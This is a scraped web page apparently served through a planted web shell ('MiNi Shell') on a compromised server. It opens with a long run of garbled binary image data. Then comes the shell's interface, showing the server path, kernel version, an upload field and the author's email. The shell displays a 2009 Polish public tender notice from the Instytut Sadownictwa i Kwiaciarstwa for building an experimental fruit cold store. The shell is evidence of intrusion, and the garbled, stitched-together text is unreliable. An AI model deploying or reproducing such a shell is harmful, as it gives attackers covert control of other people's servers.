JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/104724-N-2009.html

<p class="kh_header"><b>Skierniewice: Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców</b><br>
<b>Numer ogłoszenia: 104724 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Sadownictwa i Kwiaciarstwa , ul. Pomologiczna 18, 96-100 Skierniewice, woj. łódzkie, tel. 046 8332021, faks 046 8333228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.insad.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Chłodni Doświadczalnej z Pracownią do Oceny Jakości Pozbiorczej Owoców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	Budowa budynku jednokondygnacyjnego niepodpiwniczonego w kształcie litery C o funkcji sezonowej. Planowany okres chłodzenia w ciągu roku - I, III i IV kwartał. Konstrukcja obiektu szkieletowa - stalowa konstrukcja nośna, posadowiona na płycie fundamentowej, dachy dwuspadowe. Powierzchna zabudowy 484,20 m2, powierzchna użytkowa 389,10 m2, kubatura 2020,00 m3, z instalacjami wewnętrznymi (chłodnicza, elektryczna, teletechniczna, wodociągowa, kanalizacyjna, centralnego ogrzewania, wentylacji grawitacyjnej, klimatyzacyjna, sygnalizacji włamania i ppoż., oświetlenie zewnętrzne oraz monitoring). W budynku znajdować się będą: chłodnie do owoców i szkółkarskie, magazyn, sortownia, pracownie, pokoje biurowe, szatnie, wc, pokój śniadań oraz antresola na maszyny chłodnicze.
2.	Wykonanie glikolowej instalacji chłodniczej.
3.	Wykonanie podłączenia instalacji: wodociągowej, elektrycznej do przyłączy zewnętrznych.
4.	Wykonanie bezodpływowego szamba z podłączeniem do budynku.
5.	Wykonanie zagospodarowania terenu z kostki 477,10 m2 i 85,1 m2 żwirowego chodnika, uporządkowanie terenu.
6.	Obsługa geodezyjna - wytyczenie tras, odtworzenie ograniczników, inwentaryzacja geodezyjna powykonawcza - 2 egz.
7.	Obsługa geologiczna - badania gruntu - stopnia zagęszczenia.
8.	Zagospodarowanie odpadów zgodnie z obowiązującymi przepisami.
9.	Zamawiający rezygnuje z rozbiórki istniejącego budynku gospodarczego, instalacji wod.-kan. i elektrycznej zewnętrznej.

Wykonawca będzie zobowiązany do:
1.	Terminowej realizacji przedmiotu zadania zgodnie z harmonogramem rzeczowo-finansowym robót. 
2.	Prowadzenia wszystkich rodzajów robót przez osoby uprawnione zgodnie ze sztuką budowlaną, wiedzą techniczną oraz obowiązującymi przepisami prawnymi.
3.	Wyposażenia swoich pracowników oraz sprzętu w stosowne oznakowanie umożliwiające identyfikację w czasie prowadzenia robót.
4.	Wykonania robót zgodnie z dokumentacją projektową, obowiązującymi normami i wiedzą techniczną.
5.  Prowadzenia dokumentacji budowy.
6.  Zabezpieczenie obsługi geodezyjnej na czas budowy.
7.	Prowadzenia robót zgodnie z przepisami BHP oraz ppoż.;
8.  W przypadku wystąpienia takiej konieczności załatwienia spraw formalno - prawnych związanych z organizacją ruchu i zajęciem pasa drogowego na czas budowy oraz pokrycia kosztów związanych z zajęciem pasa drogowego.
9.  W przypadku zajęcia pasa drogowego do doprowadzenia elementów pasa drogowego do stanu określonego w decyzji wydanej przez zarządcę drogi.
10.	Terminowego przekazania Zamawiającemu przedmiotu niniejszej SIWZ w stanie technicznym nadającym się do użytkowania zgodnie z wymogami Prawa Budowlanego wraz z wszelkimi dokumentami dopuszczającymi obiekt do użytkowania zgodnie z przeznaczeniem.
11.	Wykonania i utrzymania na koszt własny zaplecza budowy oraz zlikwidowania go po zakończeniu prac. Ochrony mienia znajdującego się na terenie budowy, wykonania oraz zapewnienia warunków bezpieczeństwa pracy.
12.	W przypadku wystąpienia robót nieprzewidzianych Wykonawca zobowiązany jest niezwłocznie powiadomić o tym fakcie Zamawiającego.
13.	W przypadku wystąpienia błędów w projekcie budowlanym Wykonawca zobowiązany jest niezwłocznie powiadomić o tym fakcie Zamawiającego.
14.	Zgłaszania Zamawiającemu wpisem do Dziennika Budowy wykonania robót zanikowych lub ulegających zakryciu oraz przedmiotów odbioru.
15.	Uzyskania normatywnego wskaźnika zagęszczenia gruntu określonego odrębnymi przepisami pod realizowane obiekty.
16.	Wykonania BIOZ.
17.	Dostarczenia niezbędnych atestów, wyników oraz protokołów badań, sprawozdań i prób dotyczących realizowanego przedmiotu niniejszej SIWZ.
18.	Okazania na żądanie Zamawiającego (inspektora nadzoru) certyfikatu (deklaracji) zgodności z obowiązującymi normami lub w przypadku ich braku właściwą aprobatę techniczną w stosunku do wbudowanych materiałów.
19.	Przestrzegania uwag jednostek uzgadniających, które są zawarte w dokumentacji technicznej i specyfikacji technicznych wykonania i odbioru robót.
20.	Dostarczenia i zamontowania wszystkich urządzeń przewidzianych do wbudowania w ramach zadania inwestycyjnego na podstawie projektu budowlanego oraz zapewnienia specjalistycznego nadzoru montażu dla dostarczonych przez siebie urządzeń.
21.	Informowania Zamawiającego o konieczności wykonania robót dodatkowych w terminie 7 dni od daty stwierdzenia konieczności ich wykonania.
22.	Usuwania na bieżąco usterek stwierdzonych w trakcie realizacji robót wpisami do dziennika budowy.
23.	Usuwania wszelkich usterek stwierdzonych podczas odbiorów w terminach technicznie i organizacyjnie uzasadnionych.
24.	Odbioru technologicznego instalacji i zainstalowanych urządzeń trzy tygodnie przed odbiorem zadania.
25.	Przygotowania i przekazania Zamawiającemu dokumentacji powykonawczej w 2 egz. w tym pomiarów geodezyjnych wynikających z obowiązków służb geodezyjnych. 
26.	Zabezpieczenia instalacji i urządzeń na terenie budowy i w jej bezpośrednim otoczeniu przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, stanowiących przedmiot niniejszej SIWZ.
27.	Zabezpieczenia obiektów oraz drzew na terenie budowy i w jej bezpośrednim otoczeniu przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, stanowiących przedmiot niniejszej SIWZ.
28.	Ustawienia tablicy informacyjnej na budowie.
29.	Zapewnienia bezpiecznego korzystania z terenu przylegającego do placu budowy.
30.	Dbania o porządek na placu budowy, o schludny jej wygląd na zewnątrz oraz utrzymywania budowy w stanie wolnym od przeszkód komunikacyjnych.
31.	Po zakończeniu robót i przed przekazaniem zadania - uporządkowania terenu budowy i zaplecza budowy będącego jego własnością, jak również terenów sąsiadujących zajętych lub użytkowanych przez Wykonawcę, łącznie z przywróceniem zagospodarowania terenów w zieleń.
32.	Umożliwienia wstępu na teren budowy pracownikom Zamawiającego, pracownikom nadzoru budowlanego i innych służb, do których należy wykonanie zadań określonych w ustawie Prawo budowlane, udostępnianie im danych i informacji wymaganych tymi przepisami.

Wszystkie użyte materiały i urządzenia muszą być fabrycznie nowe.
Wszystkie nazwy własne użyte w specyfikacji i dokumentacji technicznej oznaczają pożądany standard materiałów, a Zamawiający dopuszcza użycie materiałów równoważnych pod warunkiem, że posiadają parametry techniczne nie gorsze od wskazanych.
 
Wykonawca zobowiązany będzie do ustanowienia kierowników budowy w branży budowlanej, elektrycznej i sanitarnej.
 Wykonawca zobowiązany będzie do wykonania zakresu robót objętych SIWZ, dokumentacją techniczną, specyfikacją techniczną wykonania i odbioru robót, harmonogramem rzeczowo-finansowym, tabelą elementów scalonych wraz z pracami towarzyszącymi takimi, jak: przygotowanie terenu i zaplecza robót, uprzątniecie terenu robót po zakończonych pracach, obsługa geodezyjna itp.
Wykonawca zobowiązany jest wskazać, jaki zakres robót zostanie powierzony Podwykonawcy/om.
Wykonawca udzieli 36 miesięcznej gwarancji na wykonane zadanie.
Wykonawca dokona ubezpieczenia budowy na kwotę ofertową przed rozpoczęciem realizacji zadania.
Wymaga się, aby Wykonawca dokonał oględzin plac budowy oraz jego otoczenia i pozyskał wszelkie informacje, które mogą być niezbędne w przygotowaniu oferty oraz przy zawieraniu umowy na wykonanie robót gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszty oględzin ponosi Wykonawca.
Zamawiający zabezpieczy Wykonawcy nieodpłatnie wodę i energię elektryczną dla potrzeb budowy.

Miejsce realizacji zamówienia: Nowy Dwór Parcela, gm. Nowy Kawęczyn.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.46.00-6, 45.23.24.60-4, 45.31.51.00-9, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1 Wadium w wysokości 30.000,- zł, (słownie złotych: trzydzieści tysięcy) należy wnieść przed upływem terminu składania ofert.
2. Wadium może być wniesione w pieniądzu, poręczeniach bankowych, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto BGŻ S.A. Łowicz nr 54 2030 0045 1110 0000 0001 2810 i powinno znaleźć się na rachunku Zamawiającego przed upływem terminu składania ofert.
4. Dowód wniesienia wadium należy dołączyć do oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, tj.:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonywania zamówienia, tj.:
a) wykonali w ostatnich 5 latach przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwa zadania z tego:
- jeden obiekt o charakterze pawilonowym (pod klucz) o kubaturze nie mniejszej niż 2000 m3, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 1.000.000,-zł bez podatku VAT;
- jednej chłodni (pod klucz) o kubaturze nie mniejszej niż 800 m3, dla której wartość robót wg kosztorysu wynosiła nie mniej niż 500.000,-zł bez podatku VAT;
b) dysponują osobami: 
- kierownika budowy z uprawnieniami bez ograniczeń w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi i minimum 3 letnim doświadczeniem;
- kierownika budowy z uprawnieniami bez ograniczeń w specjalności w specjalności instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami budowlanymi i minimum 3 letnim doświadczeniem;
- kierownika budowy z uprawnieniami bez ograniczeń w instalacji w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi i minimum 3 letnim doświadczeniem;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- posiadają środki finansowe lub zdolność kredytową w wysokości 500.000,- zł 
- posiadają ubezpieczenie od odpowiedzialności cywilnej na kwotę min. 1.000.000,-zł w zakresie prowadzonej działalności;
  4) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp.
2 W przypadku składania ofert wspólnych warunki określone w ppkt 2 i 3 mogą być spełnione łącznie przez Wykonawców występujących wspólnie. Pozostałe warunki musi spełnić każdy z Wykonawców.
3 Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty, opisane w części 9 specyfikacji.
Niespełnienie wymaganych warunków spowoduje wykluczenie Wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Oświadczenie Wykonawcy o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy Pzp oraz o niepodleganiu wykluczeniu na mocy art. 24 ust. 1 i 2 ustawy Pzp - załącznik nr 2; 
2 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3 Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (minimum dwa zadania), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te roboty zostały wykonane należycie - załącznik nr 3. 
      Jako odpowiadające swoim rodzajem, Zamawiający uzna roboty budowlane polegającej na wybudowaniu:
- jednego obiektu o charakterze pawilonowym (pod klucz) o kubaturze nie mniejszej niż 2000 m3, dla którego wartość robót wg kosztorysu wynosiła nie mniej niż 1.000.000,-zł bez podatku VAT;
- jednej chłodni (pod klucz) o kubaturze nie mniejszej niż 800 m3, dla której wartość robót wg kosztorysu wynosiła nie mniej niż 500.000,-zł bez podatku VAT;
4 Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 4;
5 Wykaz części zamówienia, które Wykonawca powierzy Podwykonawcy/om - załącznik nr 5;
6 Wykaz materiałów i urządzeń równoważnych - załącznik nr 6;
7 Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości minimum 500.000, -zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
8 Polisa, a w przypadku jej braku inny dokument na kwotę min. 1.000.000,-zł potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, ważny na dzień składania ofert, obejmujący cały okres realizacji zamówienia;
9 Tabela elementów scalonych - załącznik nr 1;
10 Kosztorysy ofertowe;
11 Dowód wniesienia wadium;
12 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa pkt 2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Ww. dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
13 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania;
14 Zasady udziału w postępowaniu Wykonawców występujących wspólnie:
1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
2. Wykonawcy ci składają jedną ofertę, przy czym:
- oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust. 1 ustawy Pzp w części obejmującej warunki wskazane w art. 22 ust. 1 pkt 1 i 4 oraz o niepodleganiu wykluczeniu na mocy art. 24 ust. 1 i 2 - składa każdy z Wykonawców, zaś w części obejmującej art. 22 ust. 1 pkt 2 i 3 - składają wszyscy Wykonawcy wspólnie,
- pozostałe dokumenty składają wszyscy Wykonawcy wspólnie.
3. Przed podpisaniem umowy (w przypadku wygrania przetargu) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum;
9.15 Dokumenty mogą być przedłożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku, gdy złożona przez Wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości, co do jej prawidłowości Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.insad.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Sadownictwa i Kwiaciarstwa w Skierniewicach, ul. Pomologiczna 18 pok. nr 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 10:00, miejsce: Instytut Sadownictwa i Kwiaciarstwa w Skierniewicach, ul. Pomologiczna 18 pok. nr 21 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com